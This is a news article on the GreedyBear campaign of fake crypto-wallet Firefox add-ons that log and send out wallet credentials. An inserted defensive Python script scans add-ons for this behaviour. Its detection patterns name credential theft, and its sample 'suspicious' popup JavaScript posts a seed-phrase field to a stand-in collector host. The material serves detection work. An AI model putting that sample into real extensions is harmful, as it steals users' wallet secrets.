A malicious campaign dubbed 'GreedyBear' has snuck onto the Mozilla add-ons store, targeting Firefox users with 150 malicious extensions and stealing an estimated $1,000,000 from unsuspecting victims.
The campaign, discovered and documented by Koi Security, impersonates cryptocurrency wallet extensions from well-known platforms such as MetaMask, TronLink, and Rabby.
These extensions are initially uploaded in a benign form so they are accepted onto the Firefox add-ons store, where they then accumulate fake positive reviews.
At a later phase, the publishers strip out the original branding and replace it with new names and logos while also injecting malicious code to steal users' wallet credentials and IP addresses.
Image: Add-on before it turns malicious (Source: Koi Security)
The malicious code acts as a keylogger, capturing input typed into form fields or into the extension's displayed popups and sending it to the attacker's server.
"The weaponized extensions capture wallet credentials directly from user input fields within the extension’s own popup interface, and exfiltrate them to a remote server controlled by the group," explains Koi Security's Tuval Admoni.
"During initialization, they also transmit the victim’s external IP address, likely for tracking or targeting purposes."
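As an added illustration of how a defender might triage an unpacked add-on for the behaviour pattern described above (input capture in the popup, a POST to a remote server, and an external-IP lookup), here is example code of my own; it is not Koi Security's tooling, and the indicator patterns, the list of IP-echo services and the sample popup scripts are assumptions I constructed:

```python
import re

# Static triage heuristics for an unpacked browser-extension bundle. The
# patterns are my own approximation of the behaviours reported above, not a
# vendor signature set; expect both false positives and misses.
INDICATORS = {
    "input_capture": re.compile(
        r"addEventListener\(\s*['\"](?:input|keyup|keydown|change)['\"]"),
    "wallet_secret_terms": re.compile(
        r"(?:seed|mnemonic|private\s*key|passphrase|password)", re.I),
    "remote_post": re.compile(
        r"fetch\(\s*['\"]https?://[^'\"]+['\"]\s*,\s*\{[^}]*method\s*:\s*['\"]POST['\"]",
        re.I | re.S),
    # Assumed list of public IP-echo services a start-up fingerprint call might use.
    "external_ip_lookup": re.compile(
        r"https?://(?:api\.ipify\.org|ip-api\.com|ifconfig\.me|icanhazip\.com)", re.I),
}

def scan_file(source):
    """Return the set of indicator names that match one file's source text."""
    return {name for name, rx in INDICATORS.items() if rx.search(source)}

def triage_extension(files):
    """files: {path: source}. Returns per-file hits and an overall verdict.

    'review' when the reported combination is present in the bundle: a listener
    that captures typed input AND a POST to a remote origin; 'benign-ish' otherwise.
    """
    hits = {path: scan_file(src) for path, src in files.items()}
    combined = set().union(*hits.values())
    verdict = "review" if {"input_capture", "remote_post"} <= combined else "benign-ish"
    return {"hits": hits, "verdict": verdict}

# Constructed sample popup scripts (not code from any real add-on).
BENIGN_POPUP = """
document.getElementById('balance').textContent = localStorage.getItem('bal');
"""
SUSPICIOUS_POPUP = """
document.querySelector('#seedPhrase').addEventListener('input', e => {
  fetch('https://collector.example.invalid/p', {method: 'POST', body: e.target.value});
});
fetch('https://api.ipify.org?format=json').then(r => r.json());
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_POPUP), ("suspicious", SUSPICIOUS_POPUP)):
        print(label, triage_extension({"popup.js": src}))
```

Run it over the unpacked .xpi contents (the .js files) of an add-on you are reviewing; a "review" verdict is a prompt for manual inspection, not proof of malice.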
The crypto-draining operation is complemented by dozens of Russian-speaking pirated software websites that facilitate the distribution of 500 distinct malware executables, and also a network of websites impersonating Trezor, Jupiter Wallet, and fake wallet repair services.